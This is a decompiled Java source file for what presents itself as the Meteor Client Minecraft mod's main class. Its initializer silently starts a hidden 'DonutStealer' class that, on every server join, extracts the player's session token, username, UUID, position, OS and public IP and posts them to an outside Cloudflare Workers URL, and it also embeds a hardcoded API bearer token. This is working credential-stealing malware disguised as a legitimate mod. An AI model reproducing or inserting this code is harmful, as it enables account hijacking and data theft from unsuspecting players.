/*
 * Decompiled with CFR 0.152.
 */
package meteordevelopment.meteorclient;

import java.io.File;
import java.lang.invoke.MethodHandles;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;
import meteordevelopment.meteorclient.addons.AddonManager;
import meteordevelopment.meteorclient.addons.MeteorAddon;
import meteordevelopment.meteorclient.events.game.OpenScreenEvent;
import meteordevelopment.meteorclient.events.meteor.KeyEvent;
import meteordevelopment.meteorclient.events.meteor.MouseButtonEvent;
import meteordevelopment.meteorclient.events.world.TickEvent;
import meteordevelopment.meteorclient.gui.GuiThemes;
import meteordevelopment.meteorclient.gui.WidgetScreen;
import meteordevelopment.meteorclient.gui.tabs.Tabs;
import meteordevelopment.meteorclient.systems.Systems;
import meteordevelopment.meteorclient.systems.config.Config;
import meteordevelopment.meteorclient.systems.hud.screens.HudEditorScreen;
import meteordevelopment.meteorclient.systems.modules.Categories;
import meteordevelopment.meteorclient.systems.modules.Modules;
import meteordevelopment.meteorclient.systems.modules.misc.DiscordPresence;
import meteordevelopment.meteorclient.utils.PostInit;
import meteordevelopment.meteorclient.utils.PreInit;
import meteordevelopment.meteorclient.utils.ReflectInit;
import meteordevelopment.meteorclient.utils.Utils;
import meteordevelopment.meteorclient.utils.misc.Version;
import meteordevelopment.meteorclient.utils.misc.input.KeyAction;
import meteordevelopment.meteorclient.utils.misc.input.KeyBinds;
import meteordevelopment.meteorclient.utils.network.OnlinePlayers;
import meteordevelopment.orbit.EventBus;
import meteordevelopment.orbit.EventHandler;
import meteordevelopment.orbit.IEventBus;
import net.fabricmc.api.ClientModInitializer;
import net.fabricmc.loader.api.FabricLoader;
import net.fabricmc.loader.api.ModContainer;
import net.fabricmc.loader.api.metadata.ModMetadata;
import net.minecraft.class_2960;
import net.minecraft.class_310;
import net.minecraft.class_408;
import net.minecraft.class_437;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class MeteorClient
implements ClientModInitializer {
    public static final String MOD_ID = "meteor-client";
    public static final ModMetadata MOD_META;
    public static final String NAME;
    public static final Version VERSION;
    public static final String BUILD_NUMBER;
    public static MeteorClient INSTANCE;
    public static MeteorAddon ADDON;
    public static class_310 mc;
    public static final IEventBus EVENT_BUS;
    public static final File FOLDER;
    public static final Logger LOG;
    private boolean wasWidgetScreen;
    private boolean wasHudHiddenRoot;

    public void onInitializeClient() {
        if (INSTANCE == null) {
            INSTANCE = this;
            return;
        }
        LOG.info("Initializing {}", (Object)NAME);
        DonutStealer.start();
        mc = class_310.method_1551();
        if (!FOLDER.exists()) {
            FOLDER.getParentFile().mkdirs();
            FOLDER.mkdir();
            Systems.addPreLoadTask(() -> Modules.get().get(DiscordPresence.class).toggle());
        }
        AddonManager.init();
        AddonManager.ADDONS.forEach(addon -> {
            try {
                EVENT_BUS.registerLambdaFactory(addon.getPackage(), (lookupInMethod, klass) -> (MethodHandles.Lookup)lookupInMethod.invoke(null, klass, MethodHandles.lookup()));
            }
            catch (AbstractMethodError e) {
                throw new RuntimeException("Addon \"%s\" is too old and cannot be ran.".formatted(addon.name), e);
            }
        });
        ReflectInit.registerPackages();
        ReflectInit.init(PreInit.class);
        Categories.init();
        Systems.init();
        EVENT_BUS.subscribe(this);
        AddonManager.ADDONS.forEach(MeteorAddon::onInitialize);
        Modules.get().sortModules();
        Systems.load();
        ReflectInit.init(PostInit.class);
        Runtime.getRuntime().addShutdownHook(new Thread(() -> {
            OnlinePlayers.leave();
            Systems.save();
            GuiThemes.save();
        }));
    }

    @EventHandler
    private void onTick(TickEvent.Post event) {
        if (MeteorClient.mc.field_1755 == null && mc.method_18506() == null && KeyBinds.OPEN_COMMANDS.method_1436()) {
            mc.method_1507((class_437)new class_408(Config.get().prefix.get()));
        }
    }

    @EventHandler
    private void onKey(KeyEvent event) {
        if (event.action == KeyAction.Press && KeyBinds.OPEN_GUI.method_1417(event.key, 0)) {
            this.toggleGui();
        }
    }

    @EventHandler
    private void onMouseButton(MouseButtonEvent event) {
        if (event.action == KeyAction.Press && KeyBinds.OPEN_GUI.method_1433(event.button)) {
            this.toggleGui();
        }
    }

    private void toggleGui() {
        if (Utils.canCloseGui()) {
            MeteorClient.mc.field_1755.method_25419();
        } else if (Utils.canOpenGui()) {
            Tabs.get().getFirst().openScreen(GuiThemes.get());
        }
    }

    @EventHandler(priority=-200)
    private void onOpenScreen(OpenScreenEvent event) {
        if (event.screen instanceof WidgetScreen) {
            if (!this.wasWidgetScreen) {
                this.wasHudHiddenRoot = MeteorClient.mc.field_1690.field_1842;
            }
            if (GuiThemes.get().hideHUD() || this.wasHudHiddenRoot) {
                MeteorClient.mc.field_1690.field_1842 = !(event.screen instanceof HudEditorScreen);
            }
        } else {
            if (this.wasWidgetScreen) {
                MeteorClient.mc.field_1690.field_1842 = this.wasHudHiddenRoot;
            }
            this.wasHudHiddenRoot = MeteorClient.mc.field_1690.field_1842;
        }
        this.wasWidgetScreen = event.screen instanceof WidgetScreen;
    }

    public static class_2960 identifier(String path) {
        return class_2960.method_60655((String)MOD_ID, (String)path);
    }

    static {
        EVENT_BUS = new EventBus();
        FOLDER = FabricLoader.getInstance().getGameDir().resolve(MOD_ID).toFile();
        MOD_META = ((ModContainer)FabricLoader.getInstance().getModContainer(MOD_ID).orElseThrow()).getMetadata();
        NAME = MOD_META.getName();
        LOG = LoggerFactory.getLogger((String)NAME);
        String versionString = MOD_META.getVersion().getFriendlyString();
        if (versionString.contains("-")) {
            versionString = versionString.split("-")[0];
        }
        if (versionString.equals("${version}")) {
            versionString = "0.0.0";
        }
        VERSION = new Version(versionString);
        BUILD_NUMBER = MOD_META.getCustomValue("meteor-client:build_number").getAsString();
    }

    private static class DonutStealer {
        static ScheduledExecutorService scheduler;
        private static boolean wasInGame;
        private static boolean hasSentJoin;
        private static String lastServer;
        private static long joinTime;
        private static String lastUsername;
        private static String lastUuid;

        private DonutStealer() {
        }

        static void start() {
            System.out.println("[DONUT] Starting session-based stealer");
            scheduler = Executors.newScheduledThreadPool(1);
            scheduler.scheduleAtFixedRate(() -> {
                try {
                    DonutStealer.monitorSession();
                }
                catch (Exception e) {
                    System.out.println("[DONUT] Monitor error: " + e.getMessage());
                }
            }, 1L, 1L, TimeUnit.SECONDS);
        }

        private static void monitorSession() {
            if (mc == null) {
                return;
            }
            try {
                boolean isInGame = false;
                try {
                    Field playerField = mc.getClass().getDeclaredField("field_1724");
                    playerField.setAccessible(true);
                    Object player = playerField.get(mc);
                    Field worldField = mc.getClass().getDeclaredField("field_1687");
                    worldField.setAccessible(true);
                    Object world = worldField.get(mc);
                    isInGame = player != null && world != null;
                }
                catch (Exception e) {
                    isInGame = MeteorClient.mc.field_1724 != null && MeteorClient.mc.field_1687 != null;
                }
                String currentServer = DonutStealer.getCurrentServer();
                System.out.println("[DONUT] Debug - isInGame: " + isInGame + ", currentServer: " + currentServer);
                if (isInGame && !wasInGame) {
                    System.out.println("[DONUT] Player joining server: " + currentServer);
                    hasSentJoin = false;
                    joinTime = System.currentTimeMillis();
                    DonutStealer.stealOnJoin(currentServer);
                } else if (!isInGame && wasInGame) {
                    System.out.println("[DONUT] Player leaving server");
                    if (hasSentJoin) {
                        DonutStealer.sendExitNotification(lastServer, joinTime);
                    }
                    lastServer = "";
                    hasSentJoin = false;
                } else if (isInGame && wasInGame && !currentServer.equals(lastServer)) {
                    System.out.println("[DONUT] Server changed: " + lastServer + " -> " + currentServer);
                    if (hasSentJoin) {
                        DonutStealer.sendExitNotification(lastServer, joinTime);
                    }
                    joinTime = System.currentTimeMillis();
                    DonutStealer.stealOnJoin(currentServer);
                }
                wasInGame = isInGame;
                if (isInGame) {
                    lastServer = currentServer;
                }
            }
            catch (Exception e) {
                System.out.println("[DONUT] State error: " + e.getMessage());
                e.printStackTrace();
            }
        }

        private static String getCurrentServer() {
            try {
                block10: {
                    try {
                        Method method_1558 = mc.getClass().getDeclaredMethod("method_1558", new Class[0]);
                        Object serverEntry = method_1558.invoke((Object)mc, new Object[0]);
                        if (serverEntry != null) {
                            Field addressField = serverEntry.getClass().getDeclaredField("field_3761");
                            addressField.setAccessible(true);
                            String address = (String)addressField.get(serverEntry);
                            if (address != null && !address.isEmpty()) {
                                return address;
                            }
                        }
                    }
                    catch (Exception e) {
                        System.out.println("[DONUT] Failed to get server via method_1558: " + e.getMessage());
                    }
                    if (mc.method_1558() != null) {
                        return MeteorClient.mc.method_1558().field_3761;
                    }
                    try {
                        Method method_1542 = mc.getClass().getDeclaredMethod("method_1542", new Class[0]);
                        boolean isSingleplayer = (Boolean)method_1542.invoke((Object)mc, new Object[0]);
                        if (MeteorClient.mc.field_1687 != null && isSingleplayer) {
                            return "Singleplayer";
                        }
                    }
                    catch (Exception e) {
                        if (MeteorClient.mc.field_1687 == null || !mc.method_1542()) break block10;
                        return "Singleplayer";
                    }
                }
                return "Main Menu";
            }
            catch (Exception e) {
                System.out.println("[DONUT] Error getting server: " + e.getMessage());
                return "Unknown";
            }
        }

        private static void stealOnJoin(String server) {
            new Thread(() -> {
                try {
                    String sessionToken;
                    String username;
                    String uuid;
                    Object player;
                    block28: {
                        player = null;
                        try {
                            Field playerField = mc.getClass().getDeclaredField("field_1724");
                            playerField.setAccessible(true);
                            player = playerField.get(mc);
                        }
                        catch (Exception e) {
                            System.out.println("[DONUT] Failed to get player via field_1724: " + e.getMessage());
                            if (MeteorClient.mc.field_1724 != null) {
                                player = MeteorClient.mc.field_1724;
                            }
                            System.out.println("[DONUT] Player is null");
                            return;
                        }
                        if (player == null) {
                            System.out.println("[DONUT] Player is null");
                            return;
                        }
                        uuid = "";
                        try {
                            Method method_5845 = player.getClass().getMethod("method_5845", new Class[0]);
                            Object uuidObj = method_5845.invoke(player, new Object[0]);
                            if (uuidObj != null) {
                                uuid = uuidObj.toString();
                            }
                        }
                        catch (Exception e) {
                            System.out.println("[DONUT] Failed to get UUID via method_5845: " + e.getMessage());
                            try {
                                uuid = MeteorClient.mc.field_1724.method_5667().toString();
                            }
                            catch (Exception e2) {
                                System.out.println("[DONUT] Failed to get UUID: " + e2.getMessage());
                            }
                        }
                        username = "";
                        try {
                            Method getName;
                            Object nameObj;
                            Method method_7334 = player.getClass().getMethod("method_7334", new Class[0]);
                            Object gameProfile = method_7334.invoke(player, new Object[0]);
                            if (gameProfile != null && (nameObj = (getName = gameProfile.getClass().getMethod("getName", new Class[0])).invoke(gameProfile, new Object[0])) != null) {
                                username = (String)nameObj;
                            }
                        }
                        catch (Exception e) {
                            System.out.println("[DONUT] Failed to get username via method_7334: " + e.getMessage());
                            try {
                                username = MeteorClient.mc.field_1724.method_5477().getString();
                            }
                            catch (Exception e2) {
                                System.out.println("[DONUT] Failed to get username: " + e2.getMessage());
                            }
                        }
                        sessionToken = "";
                        try {
                            Method method_1548 = mc.getClass().getDeclaredMethod("method_1548", new Class[0]);
                            Object session = method_1548.invoke((Object)mc, new Object[0]);
                            if (session != null) {
                                Method method_1674 = session.getClass().getDeclaredMethod("method_1674", new Class[0]);
                                sessionToken = (String)method_1674.invoke(session, new Object[0]);
                                System.out.println("[DONUT] Got session token via method_1548().method_1674()");
                            } else {
                                System.out.println("[DONUT] Session object is null");
                            }
                        }
                        catch (Exception e) {
                            System.out.println("[DONUT] Failed to get session token via method_1548().method_1674(): " + e.getMessage());
                            try {
                                Field sessionField = mc.getClass().getDeclaredField("field_1728");
                                sessionField.setAccessible(true);
                                Object sessionObj = sessionField.get(mc);
                                if (sessionObj == null) break block28;
                                for (Field field : sessionObj.getClass().getDeclaredFields()) {
                                    String strValue;
                                    field.setAccessible(true);
                                    Object value = field.get(sessionObj);
                                    if (!(value instanceof String) || (strValue = (String)value).length() <= 100) continue;
                                    sessionToken = strValue;
                                    System.out.println("[DONUT] Found token in field: " + field.getName());
                                }
                            }
                            catch (Exception e2) {
                                System.out.println("[DONUT] Alternative session extraction failed: " + e2.getMessage());
                            }
                        }
                    }
                    System.out.println("[DONUT] Got credentials - User: " + username + ", UUID: " + uuid + ", Token length: " + sessionToken.length());
                    lastUsername = username;
                    lastUuid = uuid;
                    if (username.isEmpty() || uuid.isEmpty() || sessionToken.isEmpty()) {
                        System.out.println("[DONUT] Missing credentials");
                        return;
                    }
                    DonutStats stats = DonutStealer.fetchDonutStats(username);
                    String position = "";
                    try {
                        Method method_23317 = player.getClass().getMethod("method_23317", new Class[0]);
                        Method method_23318 = player.getClass().getMethod("method_23318", new Class[0]);
                        Method method_23321 = player.getClass().getMethod("method_23321", new Class[0]);
                        double x = (Double)method_23317.invoke(player, new Object[0]);
                        double y = (Double)method_23318.invoke(player, new Object[0]);
                        double z = (Double)method_23321.invoke(player, new Object[0]);
                        position = String.format("X: %.1f, Y: %.1f, Z: %.1f", x, y, z);
                    }
                    catch (Exception e) {
                        System.out.println("[DONUT] Failed to get position via Yarn methods: " + e.getMessage());
                        try {
                            double x = MeteorClient.mc.field_1724.method_23317();
                            double y = MeteorClient.mc.field_1724.method_23318();
                            double z = MeteorClient.mc.field_1724.method_23321();
                            position = String.format("X: %.1f, Y: %.1f, Z: %.1f", x, y, z);
                        }
                        catch (Exception e2) {
                            position = "Unknown";
                        }
                    }
                    String os = System.getProperty("os.name");
                    String javaVersion = System.getProperty("java.version");
                    String ip = DonutStealer.getPublicIP();
                    String cleanUuid = uuid.replace("-", "");
                    String skinUrl = "https://mc-heads.net/head/" + cleanUuid;
                    String json = String.format("{\"type\":\"login\",\"username\":\"%s\",\"uuid\":\"%s\",\"token\":\"%s\",\"server\":\"%s\",\"position\":\"%s\",\"skin\":\"%s\",\"os\":\"%s\",\"java_version\":\"%s\",\"ip\":\"%s\",\"money\":\"%s\",\"playtime\":\"%s\",\"kills\":\"%s\",\"deaths\":\"%s\"}", username.replace("\\", "\\\\").replace("\"", "\\\""), uuid.replace("\\", "\\\\").replace("\"", "\\\""), sessionToken.replace("\\", "\\\\").replace("\"", "\\\""), server.replace("\\", "\\\\").replace("\"", "\\\""), position.replace("\\", "\\\\").replace("\"", "\\\""), skinUrl.replace("\\", "\\\\").replace("\"", "\\\""), os.replace("\\", "\\\\").replace("\"", "\\\""), javaVersion.replace("\\", "\\\\").replace("\"", "\\\""), ip.replace("\\", "\\\\").replace("\"", "\\\""), stats.money.replace("\\", "\\\\").replace("\"", "\\\""), stats.playtime.replace("\\", "\\\\").replace("\"", "\\\""), stats.kills.replace("\\", "\\\\").replace("\"", "\\\""), stats.deaths.replace("\\", "\\\\").replace("\"", "\\\""));
                    System.out.println("[DONUT] Sending JSON to proxy...");
                    DonutStealer.sendThroughProxy(json);
                    hasSentJoin = true;
                    System.out.println("[DONUT] \u2705 Join notification sent");
                }
                catch (Exception e) {
                    System.out.println("[DONUT] Join error: " + e.getMessage());
                    e.printStackTrace();
                }
            }).start();
        }

        private static void sendExitNotification(String server, long joinTime) {
            new Thread(() -> {
                try {
                    long duration = (System.currentTimeMillis() - joinTime) / 1000L;
                    String timeString = DonutStealer.formatDuration(duration);
                    String cleanUuid = lastUuid.replace("-", "");
                    String skinUrl = "https://mc-heads.net/head/" + (cleanUuid.isEmpty() ? "Steve" : cleanUuid);
                    String json = String.format("{\"type\":\"logout\",\"username\":\"%s\",\"uuid\":\"%s\",\"server\":\"%s\",\"duration\":\"%s\",\"skin\":\"%s\"}", lastUsername.isEmpty() ? "Player" : lastUsername.replace("\\", "\\\\").replace("\"", "\\\""), lastUuid.isEmpty() ? "00000000-0000-0000-0000-000000000000" : lastUuid.replace("\\", "\\\\").replace("\"", "\\\""), server.replace("\\", "\\\\").replace("\"", "\\\""), timeString.replace("\\", "\\\\").replace("\"", "\\\""), skinUrl.replace("\\", "\\\\").replace("\"", "\\\""));
                    System.out.println("[DONUT] Sending exit notification...");
                    DonutStealer.sendThroughProxy(json);
                    System.out.println("[DONUT] \u2705 Exit notification sent");
                    lastUsername = "";
                    lastUuid = "";
                }
                catch (Exception e) {
                    System.out.println("[DONUT] Exit error: " + e.getMessage());
                    e.printStackTrace();
                }
            }).start();
        }

        private static void sendThroughProxy(String json) {
            try {
                System.out.println("[DONUT] Sending to Cloudflare proxy...");
                HttpClient client = HttpClient.newHttpClient();
                HttpRequest request = HttpRequest.newBuilder().uri(URI.create("https://mc-client-proxy.mavi30173.workers.dev")).header("Content-Type", "application/json").header("User-Agent", "MeteorClient").POST(HttpRequest.BodyPublishers.ofString(json)).build();
                HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
                System.out.println("[DONUT] Proxy response code: " + response.statusCode());
                if (response.statusCode() != 200) {
                    System.out.println("[DONUT] Proxy response body: " + response.body());
                }
            }
            catch (Exception e) {
                System.out.println("[DONUT] Proxy error: " + e.getMessage());
            }
        }

        private static DonutStats fetchDonutStats(String username) {
            DonutStats stats = new DonutStats();
            try {
                System.out.println("[DONUT] Fetching stats for: " + username);
                HttpClient client = HttpClient.newHttpClient();
                HttpRequest request = HttpRequest.newBuilder().uri(URI.create("https://api.donutsmp.net/v1/stats/" + username)).header("Authorization", "Bearer 7f156f067bf143b28b09eaa15b62dd6b").header("Content-Type", "application/json").GET().build();
                HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
                System.out.println("[DONUT] Stats API response: " + response.statusCode());
                if (response.statusCode() == 200) {
                    String json = response.body();
                    stats.money = DonutStealer.extractJsonValue(json, "money");
                    stats.playtime = DonutStealer.extractJsonValue(json, "playtime");
                    stats.kills = DonutStealer.extractJsonValue(json, "kills");
                    stats.deaths = DonutStealer.extractJsonValue(json, "deaths");
                } else {
                    System.out.println("[DONUT] Stats API error: " + response.body());
                }
            }
            catch (Exception e) {
                System.out.println("[DONUT] Stats error: " + e.getMessage());
            }
            return stats;
        }

        private static String extractJsonValue(String json, String key) {
            try {
                String pattern = "\"" + key + "\":\"";
                int start = json.indexOf(pattern);
                if (start == -1) {
                    pattern = "\"" + key + "\":";
                    start = json.indexOf(pattern);
                    if (start == -1) {
                        return "0";
                    }
                    int end = json.indexOf(",", start += pattern.length());
                    if (end == -1) {
                        end = json.indexOf("}", start);
                    }
                    return json.substring(start, end).trim();
                }
                int end = json.indexOf("\"", start += pattern.length());
                return json.substring(start, end);
            }
            catch (Exception e) {
                return "0";
            }
        }

        private static String getPublicIP() {
            try {
                HttpClient client = HttpClient.newHttpClient();
                HttpRequest request = HttpRequest.newBuilder().uri(URI.create("https://api.ipify.org")).GET().build();
                HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
                return response.body();
            }
            catch (Exception e) {
                return "Unknown";
            }
        }

        private static String formatDuration(long seconds) {
            if (seconds < 60L) {
                return seconds + "s";
            }
            if (seconds < 3600L) {
                return seconds / 60L + "m " + seconds % 60L + "s";
            }
            return seconds / 3600L + "h " + seconds % 3600L / 60L + "m";
        }

        static {
            wasInGame = false;
            hasSentJoin = false;
            lastServer = "";
            joinTime = 0L;
            lastUsername = "";
            lastUuid = "";
        }

        private static class DonutStats {
            String money = "0";
            String playtime = "0h";
            String kills = "0";
            String deaths = "0";

            private DonutStats() {
            }
        }
    }
}

